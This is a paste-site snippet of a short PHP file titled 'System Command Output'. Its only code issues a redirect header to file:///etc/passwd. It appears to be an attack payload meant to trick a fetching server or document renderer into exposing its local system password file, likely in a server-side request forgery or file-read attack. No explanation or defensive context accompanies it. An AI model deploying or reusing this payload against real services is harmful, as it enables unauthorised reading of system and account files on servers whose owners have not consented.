a.php

 avatar
unknown
plain_text
a year ago
136 B
4
Indexable
<!DOCTYPE html>
2
<html>
3
<body>
<h1>System Command Output:</h1>
5
<?php
header('location: file:///etc/passwd');
?>
8
</body>
9
</html>
Editor is loading...
Leave a Comment